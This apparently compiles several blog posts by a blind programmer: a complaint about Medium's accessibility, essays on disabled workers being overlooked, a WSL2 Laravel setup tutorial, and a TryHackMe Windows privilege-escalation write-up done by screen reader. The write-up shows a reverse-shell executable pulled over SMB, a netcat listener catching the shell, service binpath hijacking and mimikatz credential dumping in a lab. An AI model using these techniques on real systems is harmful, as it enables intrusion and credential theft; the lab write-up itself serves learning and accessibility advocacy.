Medium: really, folks?

Before I get into it, please note that this is a free copy of an article on Medium. Some of the rest of the article won't make sense without that context.

A number of years ago, I wrote an article stating that Medium was not viable as a platform for me to write on, due to their stance, or lack thereof, on accessibility. That, I’m sorry to say, hasn’t changed all that much. My biggest complaint, the lack of alt text on the platform, has been somewhat mitigated. At least, it’s possible to add alt text now, which is one of the reasons I’m able to justify to myself to even write on this platform. The editor is pretty much as inaccessible as it’s always been, with very limited hotkey support, a lot of mouse-only operations, piles and piles of unlabeled buttons which could be fixed with literally ten seconds of work, the list goes on. Case and point: it took me five minutes to even put in this second heading, and it’s not of the correct hierarchical level. But then, given Medium only allows for 2 heading levels, I guess the point is mostly moot. Does Medium care about accessibility? Quite honestly I doubt it. It’s hard to say; this kind of neglect is often a matter of upper management not seeing the need, the room etc. to accommodate about a seventh of the world’s population. The developers themselves are far more often far more willing to put in the work, they’re often just not allowed to spend time on it. Make of that what you will. So why still write on it? Quite simply, so people can find it. I can’t get around the fact that Medium is huge. It comes up on search engine result pages, it is apparently important enough for people to become premium members just to read articles on it. Having said that, Medium will NEVER be the only place any article of mine shows up. I am on here so I can have my content available to those who need it. I may even paywall my articles on here so I can earn a small amount of money from them, but there will always be a link to a free version in order to not lock out potential readers. TLDR: I’ll be on here. I won’t have to like it, though. ;)

My older articles: accurate still?

For the most part, yes. What follows is an itemized list of things I can remember having mentioned over those couple articles, and their current status: * Jetbrains’ IDEs have gotten a little bit better, but they’re still a pain to use with screen readers. * I think I may have mentioned Slack and Discord in the past. Those are definitely a lot better than they used to be. * Mac OS, in my opinion at least, still lags behind Windows where the maturity of its accessibility offerings is concerned. Things have improved, but in my opinion not improved enough to be one’s main workhorse for anything but music creation, where it does shine in certain ways. * I’m on a Lenovo now! :P Some things have changed even throughout the time I wrote my articles, most notably the accessibility improvements in FreeCodeCamp, Codecademy and VS Code. Those are definite victories for accessibility. There have also been some serious groanworthy slips though. Looking at you, Notion.

What about yours truly?

Honestly I’ve been all over the place. I was lead coder on a text-based game for a while, consulted on a boatload of projects as an accessibility auditor/advocate, kept up ye olde programming, the works. Two relatively new things is that I’m a Twitch streamer now, I go by Zersiax, and that I’ve developed a serious appreciation and interest for cybersecurity. On that note, more posts surrounding those topics will no doubt feature in the coming time. Streams largely cover accessibility in gaming, game development and overall ways to work around inaccessible content in certain types of games, as well as the occasional coding or hacking stream. Cybersecurity might be anything from capture the flag writeups to accessibility reviews of tools, courses, etc. These are severely undercovered fields, and I’d like to try to do my part. With that though, this article has reached its end.

I work

I'm a fully blind individual who has worked several jobs. Let's run down the list:

I was a telemarketer

One of those annoying ones that try to sell you stuff. I came down your phone line trying to sell you energy contracts, or phone plans. Or well... I did that for a few days. After that, I was relegated to a simpler script, that just had me asking if a particular piece of mail had come in that day. Why? Because the software to run through the call scripts was not built with accessibility in mind. Initially, I couldn't even do the simple script. it required custom-written screen reader scripts in order to make the software on my work computer behave. people had forgotten to keep me in mind when writing the software. My reminder came too late; the software was already finished and could no longer be altered. This simple script was all I could get it to do reliably. And I'm sure I've since been forgotten about again. Several ghosts may have come and gone since I left, all running into the same barrier. Is it any wonder they feel like they need psychics to speak to us? Nobody tends to hear us otherwise...

I'm a Programmer

These days, more as a hobby than a profession, but I still consider myself a programmer by trade. I worked several jobs in this field. I worked on various backends, various websites. I worked for companies who all figured I could make them money, as long as I didn't cost them any. I was in a state of Quantum Remembrance: People gave me enough to be able to work for them, but not enough to make their tools workable by those like me. This wasn't our demographic, not our target audience. I could work on that if I had time to spare, or in my spare time. Or not at all. Time to spare as a blind programmer doesn't exist. Things, particularly when working for a company with heaps of different projects, take a bit longer to onboard. More than anything else though, I was busy reminding folks I exist. Tools my colleagues used were not accessible. Tools I used myself became inaccessible.

“We have a new UI, isn't it great?” 'No... it's not. You forgot I exist again...”

A blind programmer working both as a freelancer as well as a corporate wage slave plays a perpetual game of Russian roulette. It's like a plumber working with explosive tools; time bombs with an unknown amount of time on the timer. Wake up one day, your tools have all blown up and there's no way to get them back. Scrounge around for new tools, all while trying to meet your quota, make your appointments. Just like politicians lording over the slums they will never visit, developers writing websites, web apps, dev tools, productivity software toss their creations over the fence thinking they're doing the best they can for everyone. They do... they just forgot I exist... Until I, or someone like me, reminds them. A flicker of an ethereal presence, a ghostly whisper, easily ignored, easily squashed by reasonings of science, of business.

“You must be mistaken... ghosts wouldn't use our products... would they?”

I'm a Shaman

A shaman, in some versions of the title, acts like a bridge between the realm of the living and the realm of the dead. I currently work as an accessibility manager for a QA firm. I guess I am a shamanager. I teach the rituals needed to commune with the ghosts within the outskirts of our reality, but even more so, I act as a reminder of those outskirts. I, after all, am myself one of these ghosts.

Quick check... do you still remember me?

I get to build bridges, I get to bring the outskirts into the spotlight as it were. I work with a willing group of people who want to see through the barrier. And yet, I need to make sure I'm not forgotten, or all my teachings will similarly be forgotten when they are needed most. Not on purpose, of course, just... slipped the mind. Nobody means to, of course...

Can you still hear me, dear reader?

I Am

Outside of work, one is free. That is the idea, right? Work-life balance. Work stops when you clock out for the day. The work of a ghost never ends, though. For a ghost, life is work. You go to your job, where you work, then you go home, where you work. You work, for to leisure in a world where a system is not built for ghosts is to disappear into obscurity. Until you owe money. People seem to suddenly remember you exist when you owe money. It's interesting how that works. When you owe money, reality tips over, because you suddenly end up in a reality where every ghost is thought to have their own shaman to bridge the gaps. A ghost can't always hold a pen, or use one, or read a form. The powers that be who sent the form will ask such unfortunate ghosts to employ their shaman to help them, expecting the poor, unsuspecting ectoplasmic entity to divulge all their personal ghastly secrets to this individual. Let me divulge one of those mystical workings though: a lot of ghosts haunt alone. No shaman in sight. You forgot we existed again, didn't you?

ESP?

How did we get here? That, my dear reader, is a story spanning many ages, many decisions and many mistakes. But we did get here. Most mainstream media is not ghost-proof. Most video games, memes, websites, physical spaces, get-togethers, communities and events exclude one type of ghost or another, often knowingly so. A lot of communication methods are not inclusive to a lot of different types of ghosts. Different communities the world is rather not reminded of too often; pray tell it might ruin the Elysium we are meant to believe we've built in our post-enlightened state. Slowly, agonizingly, agonizingly slowly, it appears we as a collective species are starting to develop some ESP. Extrasensory preception. The ability to look outside one's bubble to see what's happening outside the sand dune our collective heads have been stuffed down for most our existences. Is it enough? Will the 2020s, the 2030s, the 2040s be the decade where we decide to let our ghosts be humans again? Where the segregated communities can have their culture without being entirely excluded from the overall collective consciousness the many enjoy? Where ghosts play, watch, discuss and consume the same content, at the same time the non-ghosts do? Or will we remain as we are? Formless spectres, at times drawn into clarity by an errant thought, or word, or sound byte? For the moment, I thrive in my little ghostly existence. I browbeat when I need to browbeat, and I work around the obstacles unknowing, unsuspecting ghostists place on my path. I'd certainly not mind a bit more than a ghost of a chance though. Nice as luck can be, it does tend to run out at times.

What say you, dear reader? Do you still remember me? Will you, 10 minutes from now? ..w abo.. ...orrow? Wh.................???

To most, choosing an operating system to work in is a voluntary choice, at least for their hobby projects. To some, me included, that isn't quite a luxury we can afford. Varing levels of accessibility, as well as screenreader maturity and the breathing room to run damage control if something suddenly becomes inaccessible or collapses in some other way make Windows 10 the most expedient and effective operating system for most people who are trying to be productive in tech, be it as a developer, data scientist or cybersecurity professional. Unfortunately, where development dependencies, tools and applications are concerned, especially these days, Windows is often a second-class citizen. If there are bugs, they will usually happen on the Windows side of things, often with hard to diagnose problems as a result. Enter WSL2, essentially a lightweight virtual machine that allows for the use of tools written for Linux within a Windows environment. This opens up a whole bunch of doors that we previously needed to set up a complicated virtual machine strategy for. In this article, I'll go over setting up a PHP/Laravel environment on WSL2, running on Windows 10.

Set up WSL2

The easiest way to set up WSL2 is to follow the official wsl2 setup guide. No accessibility gotchas should be encountered here in most cases. There are some reports about AMD users getting an odd prompt when enabling HyperV, I will edit this post if I encounter this myself and add remediation steps if any are required.

Now, we are in 2021, so we are doing this the spiffy way. WSL2, VS Code, Docker, the works.

Set up Docker to work with WSL2

I could wax poetic about this process, but there really isn't all that much to say. First, Install Docker and subsequently make sure you set it up correctly with WSL2. Why Docker? Ehh ...it's the thing to do these days, it normalizes development dependencies like database versions and a tool we get to a little bit later really, really likes it. Ok, onwards! :)

Set up PHP, composer, tweaks

First, let's make sure we have all the PHP modules we might need down the line installed, Pick and choose from this apt invocation:

sudo apt-get update
sudo apt install unzip php php-cli php-fpm php-json php-intl php-common php-mysql php-zip php-gd php-mbstring php-curl php-xml php-pear php-bcmath -yqq

The flags essentially make it so apt doesn't bother us while setting all that up, this shouldn't take super long but at least this way you can do something else while it's happening.

Now next, we need to install composer, the PHP package manager. A nifty little oneliner:

curl -sS https://getcomposer.org/installer | php \
            && sudo mv composer.phar /usr/local/bin/ \
            && sudo ln -s /usr/local/bin/composer.phar /usr/local/bin/composer

Quick little aside, you ideally want to stay within the Linux filesystem while doing wsl2 stuff. The mounted folder where your windows user folder is is significantly slower within WSL2, so doing a quick cd ~so you can operate from within your Linux home folder is probably worth it. Next, in order to prepare for Laravel Valet, which is normally mac only but was ported to Linux, we need to make a small change in /etc/resolv.conf. Add:

[network]
generateResolvConf=false

These lines may already be there, just commented out. If so, have them not be commented out anymore. ;)

Laravel Valet, Takeout, all the good stuff

First, let's install the Linux port of Valet and the takeout docker container manager using composer:

composer global require cpriego/valet-linux tightenco/takeout

Composer does not automatically add its global bin folder to the PATH variable, so let's do that so we can run commands in there without having to go to the directory every time. Add this to ~/.bashrc:

export PATH=~/.config/composer/vendor/bin:$PATH

And then run a simple “source ~/.bashrc” to load in the changes.

Next, run valet install to set up the valet tool. Valet messes with our /etc/resolv.conf , thee file we edited just now, turning it into a symlink. We don't want this, as that will make WSL reinitialize it on every restart. So:

sudo unlink /etc/resolv.conf
sudo cp /opt/valet-linux/valet-dns /etc/resolv.conf

On searching around a little, it seems we also need to add a file to preempt any odd DNS bugs. Here goes:

touch /opt/valet-linux/dns-servers
sudo nano /opt/valet-linux/dns-servers

Just adding “nameserver 1.1.1.1” without the quotes in there should be enough. That is the Cloudflare DNS which is pretty speedy, you can also use 8.8.8.8 for the Google DNS, for example. Ok! We're going places! Now, we can start things off with:

valet start
sudo service php7.4-fpm start 

The second command is a failsafe; sometimes valet start on ubuntu doesn't seem to start that service properly. Now, cd to the folder where your laravel projects will live, say ...~/projects/php, and run valet park.

Next, we need to enable the database. I prefer Postgresql, but there's a handful that takeout currently supports. There's two ways to do this; running “takeout enable” gives a menu you can arrow through, but given Windows screenreaders haven't figured out console highlight tracking yet, you'll probably want to provide the service name yourself, e.g. “takeout enable postgresql”. Follow the instructions and postgres will run on 127.0.0.1 for projects to use.

Setting up DNS resolution to the WSL2 instance

A cool thing about Valet is that it autoconfigures new projects to be reachable on the *.test domain invocation, routing those to localhost. Except ...WSL2's localhost isn't our localhost. We can add entries for individual sites to C:/Windows/System32/drivers/etc/hosts to route hosts to 127.0.0.1 individually, or we can use the .localhost top-level domain. To my knowledge, only Chrome currently supports this. If you want to go that route:

valet domain localhost

Installing Laravel

We can install Laravel in several ways, here's a few.

Using Docker and Laravel Sail

Given we already have docker set up, we can use a relatively new addition to the Laravel ecosystem, Laravel Sail. to do this, run the following, where the bit after the TLD is the name of the folder for the project:

curl -s https://laravel.build/helloWorld | bash

This will do a whole bunch of docker magic, after which your application will be accessible on projectname.localhost from chrome. You can read more about Laravel Sail here.

Using Composer

We have composer installed and ready to go, so an alternate way of doing this is by using our already existing infrastructure:

composer global require laravel/installer
laravel new <project name>

Conclusion

From here, the existing docs can take over. VS Code is a topic in itself, and will probably merit its own post at some point. Using the various extensions it provides, you can work within the WSL2 container, set up your PHP tools on the WSL2 site in order to get linting and static checking support etc. That's enough out of me for now.

This year, I have committed to learning more about cybersecurity. This has always been an interest of mine but I never could find the time and resources to properly level up on this particular topic. I do now, and it's been a lot of fun so far. Through a bit of luck I got my hands on a voucher for TryHackMe which , together with the circumstances we're in right now, gave me the means to properly pursue this interest.

So far, I have been following the so-called “ Complete Beginner Learning Path” which essentially allows you to dip your toes into various aspects of this field. It covers things like basic networking, Linux fundamentals and simple vulnerability exploitation through little project-based, learn-as-you-go-style challenges called rooms, in which bite-sized helpings of theory are interspersed with exercises and attack simulations to put what you've just learned to use in a more practical setting.

Why this room in particular?

Most rooms so far, I have been able to complete successfully with a screenreader without doing all that much to dodge around accessibility restrictions. The only time this came up was when using an actual GUI tool to analyze web traffic, and I'm sure I'll add a write-up of that particular room one day as well. This room however had me scratching my head for a minute, because your only starting point in is RDP, which is completely inaccessible as it only passes along bitmaps of the target machine, no actual info a screen reader can do anything with. I managed to dodge around it, and the way I describe it here is obviously not a pleasant way of working at all. RDP , for blind hackers, should probably always be an absolute last resort, preferring almost anything over actually using this as a way in. What follows next is what would happen if you have absolutely no other recourse left, and is not representative of how difficult hacking is for screenreader users in general. The majority of things I have come in contact with so far, including web application hacking and wireless packet analysis, is easier and more doable by several orders of magnitude given the right tools are used, many of which are industry standard.

The actual write-up so the TLDR folks can quickly skip to this part

As a point of principle, I am not going to be adding screenshots to these posts. There's a dime a dozen posts on Medium that do this already, and the target audience of this post either won't find them useful anyway, or will have to deal with the fact I am forcing the reader immersion into my workflow by only giving them information I myself have access to. That inadvertently means this is a bit of a wall of text. Ehh ...sorry about that :) Anyway, here we go.

Initial Foothold: Oh no RDP!

I'm sure I could have ran metasploit against this box, set it to look for vulnerabilities, get a coffee and come back to it having exploited, owned, neutralized and packed up the box for shipping, but where's the fun in that? Fortunately, we only really need the GUI for a very brief interval on this particular engagement. RDP is not a good attack vector for a blind person to depend on as you'll soon discover, but hey, living off the land and all that. The first thing I tried was to use the browser-based attackbox THM offers you to RDP into the machine. To my delight, sound actually works on these by default which probably means I can install Orca on it and have it talk to me, but something for another time. TODO: Poke someone at THM about having it be installed by default so I don't have to write a BASH script to do it for me; these boxes only stay up a couple of hours at a time. I quickly noticed that using NVDA's OCR feature on the output of the browser-based machine just wasn't going to work; there were too many recognition errors to really make anything of the output so I quickly abandoned that idea. Next idea: I am running Windows, the box is running Windows, the protocol is RDP. I should just be able to use Remote Desktop to log in, maybe that gives us a clearer picture. I'd have to hook up to the VPN, but that's doable enough. This thing where at times I need to use two operating systems in tandem isn't new, in my dayjob as a developer this happens all the time as well.

It ... does work better, actually. After logging in, and getting myself stuck because I wasn't aware ctrl+alt+break of all things is how you stop sending input to the remote session, the OCR results are quite a bit clearer. Still garbage, but lego-brick-shaped garbage we can actually do something with, kinda.

Us screenreader users have to pretty much depend on keyboard shortcuts for the majority of things, so opening up a commandline blind (heh) is something I don't even have to think about. Windows+r, cmd, RET. crickets We need to verify if it actually worked, as there is no screenreader feedback whatsoever while this is happening.

Ctrl+alt+break, nvda+r:

 Rec)/de B Select C:\Windows\system32\CMD.e><e AdminPai PrivESC ~ Shoncw Microsoft Windows [Version 10.6.17763.737] (C) 2618 Microsoft Corporation. All rights reserved C: \Users\user>‘ 

I know that looks horrid. I'm not going to clean it up. That is what I got back, that's what I'll have to deal with. What do we know from this?

• This is a Windows 10 box, albeit a somewhat older one.
• We are user, and we are in c:\users\user. We have write-access there , which is good.
• We may be focused on the prompt line. The fact the word “ Select” is in this output worries me, as that may mean we are not. Hammering down arrow should make sure we are.

Now, all we really need to do here is make sure we get the msfvenom-generated reverse shell over to this box, so we can stop messing around with garbled OCR results and actually get some work done. The idea to use SMB for this, as the room suggests, seems as good a one as any, so let's do that. On the attacking machine:

 python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

Some explanatory output is returned, the server is just hanging out where we told it to, so now the fun part begins. We actually need to perform a command on the remote session to grab our little innocent reverse.exe. I'm sure that just flips strings around. Yes ...that is most certainly what it does, it's great fun. ;) There's a few ways to paste into a Windows commandline window. There's the system menu's edit submenu, there's a right-click in the right spot, and there's plain old ctrl+v which doesn't always work. A quick check, I'll spare you the garbled mess this time, reveals that ctrl+v does work in this case.

This is good since it means we can make sure the command we are about to feed to the remote session is free of errors. Feedback in an RDP session is nonexistent, so we can't see what we're typing, but we can write the command somewhere else and paste it in there with ctrl+v. Pay attention, there's a quiz on these later. ;)

On the remote Windows box:

 copy \\10.10.59.243\kali\reverse.exe .

And again, ctrl+alt+break, NVDA+r:

 C \Users\user>copy \\10.10.59.243\kali\reverse.exe 1 file(s) copied C:\Users\user>_ <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> <DIR> Rec)/C|9 B C:\Windows\system32\cmd.exe C \Users\user>copy \\10.10.59.243\kali\reverse.exe The network path was not found. 3D Objects Contacts Desktop Documents Downloads Favorites Links Music Pictures Saved Games Searches Videos 0 File(s) 0 bytes 14 Dir(s) 30,835,068,928 bytes free == /O Type here to Search O Q' _M ><

I have to point out that I am writing this as I'm doing it, and throughout doing that I lost the machine for a while so had to retrace my steps. The output is entirely in the wrong order; my smb server on the attack box didn't properly come up the first time which is why copy initially didn't work, but we can see in that horrible mess that we managed to copy the file. Hurray, we almost have a real shell. And yes, I use that term scathingly, because heck, netcat is better than this.

Speaking of netcat, all we now really need to do is make sure to run reverse.exe, which shouldn't give us any output. Just imagine I did that, right after starting a netcat listener for it to reverse-shell its way into:

 root@kali:~# nc -lvp 5300
listening on [any] 5300 ...
connect to [10.10.59.243] from ip-10-10-28-85.eu-west-1.compute.internal [10.10.28.85] 49778
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\user>

Woohoo! No more garble garble. We can actually perform the actions we need to do to complete the room from here on out. Now for the people watching at home, I deviated from the room in two minor ways to essentially cover my behind in case this would've gone south:

• I copied the file to the user folder, rather than c:\privesc as indicated, because I wasn't sure if I would have writing perms there and I did not want to deal with that over an RDP shell.
• I deliberately picked a port over 1024 to not have to use sudo on the kali box which in hindsight probably wasn't entirely necessary, but there you have it.

Rest of the tasks

I might as well finish this up while I'm here. This isn't a walkthrough per se, more of a “yo, this is what I ran into” stream-of-consciousness kind of post. I will briefly describe my subsequent steps, unless we run into another fun accessibility challenge of course.

The task we just did was task 2, which is the simplest task in the room. Go figure :) Task 3 requires us to first copy to the c:\privesc folder which conveniently holds a bunch of privilege escalation tools for us. Thanks, VM creators, saves me a few downloads :)

The room takes us through checking a service's access rights for the given user, and then through changing the binpath to our reverse.exe shell which then connects to a second netcat listener on the same port in order to give us a netcat shell with local system privileges. No real accessibility hurdle here, apart from needing to make very sure you get the binpath invocation exactly right, spacing and all. Use at least “most” for a screen reader's punctuation setting or go character by character. Or use braille, which makes all of this SO much easier.

This remains true for the following tasks. All of it is commandline-based, even the registry can be efficiently queried using the commandline. In my case there was a hurdle in the fact that there were no creds in the winLogon registry key where there were supposed to be some, but winPeas to the rescue there in combination with one of the privilege escalation methods we already covered to get system-level privileges. Cheating just a little, I'm aware.

Two more tricky bits happened throughout this particular room:

• Unfortunately the infoSec community does not appear to be immune to the consequences of Python 2.7 reaching end of life. Kali has marched on, but some tools, notably creddump7, have not. I was unable to get it to run, nor its various forks which claim python3 compatibility. Task 11 will require you to use some other tool; I used mimikatz even though that required me to craft another copy command for the remote session because that tool, at least to my knowledge, needs to be run on the target itself. egh. :(

• Towards the end, the room wants you to run powershell as admin, telling you to right-click it and select “ Run as Administrator”. You can do that from the keyboard with win+r, powershell, ctrl+shift+enter, alt+y. People writing duckyscript exploits pay attention ;)

Extra Credit

There are screenreaders out there that have the ability to perform their own brand of remote access. This, chiefly, because the existing ones just flat out don't work very well. Generally they use a server somewhere as a go-between, relying on an almost Teamviwer-like exchange of keys to connect to each other. If you feel you can get away with storing a preconfigured copy of such a screenreader on the target, it should theoretically be relatively painless to set up a connection to that copy and do the RDP stuff that way. Obviously that would make the target system spit out a whole bunch of TTS chatter over the default audio device before you have a chance to kill the sound, so it's not exactly stealthy, but hey ...it's just another tool. :) For VMs, it might actually work better. For actual engagements ...ehh ...maybe not so much.

Conclusion

I won't lie. This room was frustrating, it was hard. It took way longer than it probably should have. Not because the material covered was particularly hard; it wasnt, not all that much in any case. It was hard because of all the extra effort to make sure the RDP parts go well, to make sure you don't accidentally kill the netcat listener with a careless ctrl+c as that means you have to do the same song and dance all over again. It was hard because I had to figure out some deviations from the instructions; creddump7 didn't work, I had to fall back to winPEAS to get a stored set of creds that I couldn't seem to find in the place they should've been. It was hard because the target would inexplicably go down now and again making me have to do the RDP process described above at least 5-6 times. I've gotten faster at it :) It was hard. I'm going to do it again. :)